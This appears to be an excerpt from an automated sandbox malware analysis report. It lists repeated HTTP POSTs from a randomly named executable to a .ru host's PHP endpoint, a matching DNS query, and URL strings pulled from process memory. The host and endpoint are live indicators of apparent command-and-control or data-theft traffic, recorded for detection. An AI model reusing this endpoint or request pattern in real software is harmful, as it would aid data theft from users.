Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1936Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1936Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1936Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1936Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1936Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1936Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1908Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1936Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1936Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1056Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1936Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1936Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1056Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1936Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 1060Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 749858cm.renyash.ru

Source: unknown

HTTP traffic detected: POST /javascriptrequestApiBasePrivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 749858cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000003102000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://749858cm.reP:
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002E28000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000003102000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://749858cm.renyash.ru
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://749858cm.renyash.ru/
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002E28000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000003102000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://749858cm.renyash.ru/javascriptrequestApiBasePrivate.php
Source: svchost.exe, 0000001C.00000002.3017784177.0000022F85600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000001C.00000003.2173548444.0000022F85438000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000001C.00000003.2173548444.0000022F85438000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000001C.00000003.2173548444.0000022F85438000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000001C.00000003.2173548444.0000022F8546D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.28.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000000E.00000002.2162276807.0000023890073000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.2069904131.0000016CD1B58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000E.00000002.2067060610.0000023880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2069904131.0000016CD1B58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: BrokerhostNet.exe, 00000007.00000002.2027859047.000000000325D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2067060610.0000023880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2069904131.0000016CD1931000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.2067060610.0000023880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2069904131.0000016CD1B58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000F.00000002.2069904131.0000016CD1B58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
